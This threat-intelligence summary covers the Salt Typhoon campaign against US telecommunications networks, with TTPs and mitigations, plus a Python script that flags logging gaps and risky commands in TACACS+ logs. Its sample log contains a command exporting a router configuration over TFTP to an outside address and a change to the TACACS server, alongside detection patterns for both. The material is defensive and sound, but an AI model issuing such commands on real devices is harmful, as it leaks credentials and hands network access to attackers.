Full Report
Having tracked reports of extensive intrusion activities targeting several U.S. telecommunications firms, researchers from Cisco Talos have investigated... The post Cisco Talos warns of prolonged intrusions in US critical infrastructure by Salt Typhoon hackers using LOTL techniques appeared first on Industrial Cyber.
Analysis Summary
# Threat Actor: Salt Typhoon (and RedMike)
## Attribution & Identity
Linked to the Chinese government and to entities tied to Beijing. Investigated by Cisco Talos. Corresponds to the group named 'RedMike' by Recorded Future's Insikt Group.
## Activity Summary
The threat actor conducted extensive intrusion activities, primarily targeting U.S. telecommunications firms and internet service providers. The campaign, dubbed 'Salt Typhoon' by investigators, focused on compromising core U.S. infrastructure to pursue sensitive information. A hallmark of the campaign is sustained persistence, with one instance showing access maintained for over three years. The associated group RedMike targeted internet-facing Cisco network devices, predominantly affecting global telecommunications providers between December 2024 and January 2025.
## Tactics, Techniques & Procedures
- **Initial Access:** Gaining access through the use of legitimate, stolen victim login credentials.
- **Persistence & Credential Harvesting:** Maintaining persistence across multi-vendor equipment; actively attempting to acquire additional credentials by obtaining network device configurations and deciphering accounts with weak password types.
- **Data Collection:** Capturing SNMP, TACACS, and RADIUS traffic, including secret keys, to enumerate credential details.
- **Exfiltration:** Exfiltrating device configurations (often containing sensitive authentication material like SNMP R/W community strings and weakly encrypted local passwords) over TFTP and/or FTP.
- **Lateral Movement/Pivoting:** Significant use of 'machine to machine' pivoting through compromised infrastructure (hop points) across different manufacturers' equipment to move within trusted segments or conduct exfiltration operations, often bypassing access controls by manipulating AAA server settings.
- **Technique:** Heavy use of living-off-the-land (LOTL) techniques on network devices.
- **Tooling:** Use of a custom-built utility.
## Targeting
- **Sectors:** Telecommunications firms, Internet Service Providers (ISP), and core U.S. infrastructure.
- **Geography:** Primarily the United States, with victims including a U.S.-based affiliate of a U.K. telecommunications provider and a telecommunications provider based in South Africa.
- **Victims:** Several U.S. telecommunications firms; a handful of U.S. internet service providers.
## Tools & Infrastructure
- **Malware families used:** Not explicitly named beyond a "custom-built utility."
- **Infrastructure (C2, domains, IPs):** No specific C2 domains or IPs are provided in the source. The actor manipulated AAA server settings, adding supplemental server addresses under their control, to bypass access control systems.
## Implications
This campaign represents significant, long-term cyber espionage targeting critical U.S. infrastructure networks (telecoms/ISPs). The actor demonstrates sophisticated persistence, advanced credential harvesting techniques on network equipment, and effective pivoting capabilities to move laterally and exfiltrate data while remaining undetected, indicating a high level of operational tradecraft associated with a state-sponsored entity.
## Mitigations
- Conduct comprehensive configuration management and auditing for network devices.
- Conduct comprehensive monitoring of authentication, authorization, and command issuance.
- Monitor syslog and AAA logs for unusual activity, specifically decreases or gaps in logged activity.
- Profile network devices (fingerprint via NetFlow and port scanning) for shifts in their exposed surface: new ports opening or closing, and changes in traffic in or out of devices.
- Develop NetFlow visibility to identify unusual volumetric changes.
- Look for non-empty or unusually large `.bash_history` files on devices.
- Ensure timely patching of known CVEs that threat actors might leverage with publicly available tooling.
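As an added illustration of the logging-gap and command-monitoring mitigations above (example code written for this summary, not from Cisco Talos or Industrial Cyber), the script below parses constructed TACACS+ command-accounting lines, reports per-device silences longer than a threshold, and flags commands matching the TTPs described: config export over TFTP/FTP, AAA server changes, and SNMP community changes. The log line format, device names, addresses and rule set are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample TACACS+ command-accounting records (not real data):
# "<ISO timestamp> <device> <user> cmd=<command typed on the device>"
SAMPLE_LOG = """\
2025-01-10T08:00:00 rtr-edge-01 netops cmd=show version
2025-01-10T08:30:00 rtr-edge-01 netops cmd=show ip interface brief
2025-01-10T09:00:00 rtr-edge-01 netops cmd=show running-config
2025-01-10T14:00:00 rtr-edge-01 netops cmd=copy running-config tftp://198.51.100.7/cfg.txt
2025-01-10T14:01:00 rtr-edge-01 netops cmd=tacacs-server host 198.51.100.9
2025-01-10T08:05:00 rtr-core-02 netops cmd=show bgp summary
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) cmd=(.*)$")
# Patterns mirroring the TTPs above: config export over TFTP/FTP,
# AAA server changes, SNMP community changes (hypothetical rule set).
RISKY_PATTERNS = {
    "config export over tftp/ftp": re.compile(r"^copy\b.*\b(tftp|ftp):", re.I),
    "AAA server setting change": re.compile(r"^(tacacs-server|radius-server|aaa )", re.I),
    "SNMP community change": re.compile(r"^snmp-server community\b", re.I),
}

def parse_log(text):
    """Return [(timestamp, device, user, command)] for well-formed lines."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:  # malformed lines are skipped rather than aborting the sweep
            records.append((datetime.fromisoformat(m[1]), m[2], m[3], m[4]))
    return records

def find_logging_gaps(records, max_gap=timedelta(hours=3)):
    """Per device, list (gap_start, gap_end) silences longer than max_gap."""
    by_device = defaultdict(list)
    for ts, device, _, _ in records:
        by_device[device].append(ts)
    gaps = {}
    for device, stamps in by_device.items():
        stamps.sort()
        found = [(a, b) for a, b in zip(stamps, stamps[1:]) if b - a > max_gap]
        if found:
            gaps[device] = found
    return gaps

def flag_risky_commands(records):
    """(timestamp, device, user, command, reason) for each RISKY_PATTERNS hit."""
    return [(ts, dev, user, cmd, reason) for ts, dev, user, cmd in records
            for reason, pat in RISKY_PATTERNS.items() if pat.search(cmd)]
```

On the sample, rtr-edge-01 is silent for five hours and then exports its configuration and changes its TACACS+ server, which is the combination of signals the mitigations above are meant to surface.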